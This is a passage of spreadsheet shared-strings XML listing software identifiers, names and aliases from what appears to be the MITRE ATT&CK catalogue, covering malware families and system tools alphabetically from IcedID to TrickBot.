  </si>
  <si>
    <t>S0483</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>OSX/MacDownloader</t>
  </si>
  <si>
    <t>S0434</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>S0604</t>
  </si>
  <si>
    <t>Industroyer</t>
  </si>
  <si>
    <t>CRASHOVERRIDE, Win32/Industroyer</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>S0463</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>ipconfig.exe</t>
  </si>
  <si>
    <t>S0581</t>
  </si>
  <si>
    <t>IronNetInjector</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>Ixeshe</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>S0528</t>
  </si>
  <si>
    <t>Javali</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>Trojan.Sofacy, Seduploader, JKEYSKW, Sednit, GAMEFISH, SofacyCarberp</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>JSocket, AlienSpy, Frutas, Sockrat, Unrecom, jFrutas, Adwind, jBiFrost, Trojan.Maljava</t>
  </si>
  <si>
    <t>S0648</t>
  </si>
  <si>
    <t>JSS Loader</t>
  </si>
  <si>
    <t>S0325</t>
  </si>
  <si>
    <t>Judy</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>S0585</t>
  </si>
  <si>
    <t>Kerrdown</t>
  </si>
  <si>
    <t>S0487</t>
  </si>
  <si>
    <t>Kessel</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>OSX/Keydnap</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>S0288</t>
  </si>
  <si>
    <t>KeyRaider</t>
  </si>
  <si>
    <t>S0526</t>
  </si>
  <si>
    <t>KGH_SPY</t>
  </si>
  <si>
    <t>S0607</t>
  </si>
  <si>
    <t>KillDisk</t>
  </si>
  <si>
    <t>Win32/KillDisk.NBI, Win32/KillDisk.NBH, Win32/KillDisk.NBD, Win32/KillDisk.NBC, Win32/KillDisk.NBB</t>
  </si>
  <si>
    <t>S0599</t>
  </si>
  <si>
    <t>Kinsing</t>
  </si>
  <si>
    <t>S0437</t>
  </si>
  <si>
    <t>Kivars</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>S0641</t>
  </si>
  <si>
    <t>Kobalos</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t>S0513</t>
  </si>
  <si>
    <t>LiteDuke</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>S0447</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>S0582</t>
  </si>
  <si>
    <t>LookBack</t>
  </si>
  <si>
    <t>S0451</t>
  </si>
  <si>
    <t>LoudMiner</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>S0532</t>
  </si>
  <si>
    <t>Lucifer</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>Enfal</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>Pyark</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>oxide, briar, ricinus, darkmatter</t>
  </si>
  <si>
    <t>S0317</t>
  </si>
  <si>
    <t>S0652</t>
  </si>
  <si>
    <t>MarkiRAT</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>Matryoshka</t>
  </si>
  <si>
    <t>S0303</t>
  </si>
  <si>
    <t>MazarBOT</t>
  </si>
  <si>
    <t>S0449</t>
  </si>
  <si>
    <t>S0500</t>
  </si>
  <si>
    <t>MCMD</t>
  </si>
  <si>
    <t>S0459</t>
  </si>
  <si>
    <t>MechaFlounder</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>S0576</t>
  </si>
  <si>
    <t>MegaCortex</t>
  </si>
  <si>
    <t>S0530</t>
  </si>
  <si>
    <t>Melcoz</t>
  </si>
  <si>
    <t>S0443</t>
  </si>
  <si>
    <t>MESSAGETAP</t>
  </si>
  <si>
    <t>S0455</t>
  </si>
  <si>
    <t>Metamorfo</t>
  </si>
  <si>
    <t>Casbaneiro</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>Mal/Miner-C, PhotoMiner</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>S0280</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>S0553</t>
  </si>
  <si>
    <t>MoleNet</t>
  </si>
  <si>
    <t>S0407</t>
  </si>
  <si>
    <t>Monokle</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>SKID, Terra Loader, SpicyOmelette</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>S0637</t>
  </si>
  <si>
    <t>NativeZone</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>S0590</t>
  </si>
  <si>
    <t>NBTscan</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>nbtstat.exe</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>S0630</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>net.exe</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>NetC</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>netsh.exe</t>
  </si>
  <si>
    <t>S0104</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>netstat.exe</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>S0457</t>
  </si>
  <si>
    <t>Netwalker</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>S0508</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>Backdoor.Nidiran</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>Njw0rm, LV, Bladabindi</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>S0299</t>
  </si>
  <si>
    <t>NotCompatible</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>ExPetr, Diskcoder.C, GoldenEye, Petrwrap, Nyetya</t>
  </si>
  <si>
    <t>S0286</t>
  </si>
  <si>
    <t>OBAD</t>
  </si>
  <si>
    <t>S0644</t>
  </si>
  <si>
    <t>ObliqueRAT</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>S0439</t>
  </si>
  <si>
    <t>Okrum</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>Sasfis</t>
  </si>
  <si>
    <t>S0285</t>
  </si>
  <si>
    <t>OldBoot</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>AIRBREAK</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>Zshlayer, Crossrider</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>Backdoor.MacOS.OCEANLOTUS.F</t>
  </si>
  <si>
    <t>S0594</t>
  </si>
  <si>
    <t>Out1</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>S0598</t>
  </si>
  <si>
    <t>P.A.S. Webshell</t>
  </si>
  <si>
    <t>Fobushell</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>Peer-to-Peer ZeuS, Gameover ZeuS</t>
  </si>
  <si>
    <t>S0626</t>
  </si>
  <si>
    <t>P8RAT</t>
  </si>
  <si>
    <t>HEAVYPOT, GreetCake</t>
  </si>
  <si>
    <t>S0399</t>
  </si>
  <si>
    <t>Pallas</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>S0556</t>
  </si>
  <si>
    <t>Pay2Key</t>
  </si>
  <si>
    <t>S0316</t>
  </si>
  <si>
    <t>Pegasus for Android</t>
  </si>
  <si>
    <t>Chrysaor</t>
  </si>
  <si>
    <t>S0289</t>
  </si>
  <si>
    <t>Pegasus for iOS</t>
  </si>
  <si>
    <t>S0587</t>
  </si>
  <si>
    <t>Penquin</t>
  </si>
  <si>
    <t>Penquin 2.0, Penquin_x64</t>
  </si>
  <si>
    <t>S0643</t>
  </si>
  <si>
    <t>Peppy</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>S0517</t>
  </si>
  <si>
    <t>Pillowmint</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>S0501</t>
  </si>
  <si>
    <t>PipeMon</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
    <t>Pisloader</t>
  </si>
  <si>
    <t>S0291</t>
  </si>
  <si>
    <t>PJApps</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>S0435</t>
  </si>
  <si>
    <t>PLEAD</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>DestroyRAT, Sogu, Kaba, Korplug</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>S0428</t>
  </si>
  <si>
    <t>PoetRAT</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>Poison Ivy, Darkmoon</t>
  </si>
  <si>
    <t>S0518</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>S0453</t>
  </si>
  <si>
    <t>Pony</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>Win32/Agent.UAW</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>S0441</t>
  </si>
  <si>
    <t>PowerShower</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>DNSMessenger</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>Powermud</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>S0654</t>
  </si>
  <si>
    <t>ProLock</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>S0613</t>
  </si>
  <si>
    <t>PS1</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>ShellTea</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>PSVC</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>S0583</t>
  </si>
  <si>
    <t>Pysa</t>
  </si>
  <si>
    <t>Mespinoza</t>
  </si>
  <si>
    <t>S0650</t>
  </si>
  <si>
    <t>QakBot</t>
  </si>
  <si>
    <t>Pinkslipbot, QuackBot, QBot</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>xRAT</t>
  </si>
  <si>
    <t>S0481</t>
  </si>
  <si>
    <t>Ragnar Locker</t>
  </si>
  <si>
    <t>S0565</t>
  </si>
  <si>
    <t>S0629</t>
  </si>
  <si>
    <t>RainyDay</t>
  </si>
  <si>
    <t>S0458</t>
  </si>
  <si>
    <t>Ramsay</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>FIENDCRY, DUEBREW, DRIFTWOOD</t>
  </si>
  <si>
    <t>S0295</t>
  </si>
  <si>
    <t>RCSAndroid</t>
  </si>
  <si>
    <t>S0495</t>
  </si>
  <si>
    <t>RDAT</t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>S0539</t>
  </si>
  <si>
    <t>Red Alert 2.0</t>
  </si>
  <si>
    <t>S0326</t>
  </si>
  <si>
    <t>RedDrop</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>BUGJUICE</t>
  </si>
  <si>
    <t>reg.exe</t>
  </si>
  <si>
    <t>S0511</t>
  </si>
  <si>
    <t>RegDuke</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>S0592</t>
  </si>
  <si>
    <t>RemoteUtilities</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>Backdoor.Remsec, ProjectSauron</t>
  </si>
  <si>
    <t>S0174</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>S0496</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>Sodin, Sodinokibi</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>S0433</t>
  </si>
  <si>
    <t>Rifdoor</t>
  </si>
  <si>
    <t>S0403</t>
  </si>
  <si>
    <t>Riltok</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>S0448</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>S0411</t>
  </si>
  <si>
    <t>Rotexy</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>route.exe</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>Redaman</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>S0313</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>S0446</t>
  </si>
  <si>
    <t>Ryuk</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>Sakurel, VIPER</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>Samas</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>schtasks.exe</t>
  </si>
  <si>
    <t>S0461</t>
  </si>
  <si>
    <t>SDBbot</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>SeaDaddy, SeaDesk</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>S0639</t>
  </si>
  <si>
    <t>S0596</t>
  </si>
  <si>
    <t>ShadowPad</t>
  </si>
  <si>
    <t>POISONPLUG.SHADOW</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>Disttrack</t>
  </si>
  <si>
    <t>S0546</t>
  </si>
  <si>
    <t>SharpStage</t>
  </si>
  <si>
    <t>S0450</t>
  </si>
  <si>
    <t>SHARPSTATS</t>
  </si>
  <si>
    <t>S0294</t>
  </si>
  <si>
    <t>ShiftyBug</t>
  </si>
  <si>
    <t>S0444</t>
  </si>
  <si>
    <t>S0445</t>
  </si>
  <si>
    <t>ShimRatReporter</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>Backdoor.APT.CookieCutter, Pirpi</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>S0589</t>
  </si>
  <si>
    <t>Sibot</t>
  </si>
  <si>
    <t>S0610</t>
  </si>
  <si>
    <t>SideTwist</t>
  </si>
  <si>
    <t>S0549</t>
  </si>
  <si>
    <t>SilkBean</t>
  </si>
  <si>
    <t>S0623</t>
  </si>
  <si>
    <t>Siloscape</t>
  </si>
  <si>
    <t>S0419</t>
  </si>
  <si>
    <t>SimBad</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>S0468</t>
  </si>
  <si>
    <t>Skidmap</t>
  </si>
  <si>
    <t>S0327</t>
  </si>
  <si>
    <t>Skygofree</t>
  </si>
  <si>
    <t>S0633</t>
  </si>
  <si>
    <t>Sliver</t>
  </si>
  <si>
    <t>S0533</t>
  </si>
  <si>
    <t>SLOTHFULMEDIA</t>
  </si>
  <si>
    <t>JackOfHearts, QueenOfClubs</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>Dofoil</t>
  </si>
  <si>
    <t>S0649</t>
  </si>
  <si>
    <t>SMOKEDHAM</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>S0627</t>
  </si>
  <si>
    <t>SodaMaster</t>
  </si>
  <si>
    <t>DARKTOWN, dfls, DelfsCake</t>
  </si>
  <si>
    <t>S0615</t>
  </si>
  <si>
    <t>SombRAT</t>
  </si>
  <si>
    <t>S0516</t>
  </si>
  <si>
    <t>SoreFang</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>S0543</t>
  </si>
  <si>
    <t>Spark</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>S0646</t>
  </si>
  <si>
    <t>SpicyOmelette</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>S0324</t>
  </si>
  <si>
    <t>SpyDealer</t>
  </si>
  <si>
    <t>S0305</t>
  </si>
  <si>
    <t>SpyNote RAT</t>
  </si>
  <si>
    <t>S0225</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>S0328</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>DROPSHOT</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>S0491</t>
  </si>
  <si>
    <t>StrongPity</t>
  </si>
  <si>
    <t>S0603</t>
  </si>
  <si>
    <t>Stuxnet</t>
  </si>
  <si>
    <t>W32.Stuxnet</t>
  </si>
  <si>
    <t>S0559</t>
  </si>
  <si>
    <t>SUNBURST</t>
  </si>
  <si>
    <t>Solorigate</t>
  </si>
  <si>
    <t>S0562</t>
  </si>
  <si>
    <t>SUNSPOT</t>
  </si>
  <si>
    <t>S0578</t>
  </si>
  <si>
    <t>SUPERNOVA</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>S0519</t>
  </si>
  <si>
    <t>SYNful Knock</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>S0464</t>
  </si>
  <si>
    <t>SYSCON</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>S0586</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE</t>
  </si>
  <si>
    <t>S0467</t>
  </si>
  <si>
    <t>TajMahal</t>
  </si>
  <si>
    <t>S0329</t>
  </si>
  <si>
    <t>Tangelo</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>S0560</t>
  </si>
  <si>
    <t>TEARDROP</t>
  </si>
  <si>
    <t>S0545</t>
  </si>
  <si>
    <t>TERRACOTTA</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>S0595</t>
  </si>
  <si>
    <t>ThiefQuest</t>
  </si>
  <si>
    <t>MacRansom.K, EvilQuest</t>
  </si>
  <si>
    <t>S0558</t>
  </si>
  <si>
    <t>Tiktok Pro</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>S0424</t>
  </si>
  <si>
    <t>Triada</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>Totbrick, TSPY_TRICKLOAD</t>
  </si>
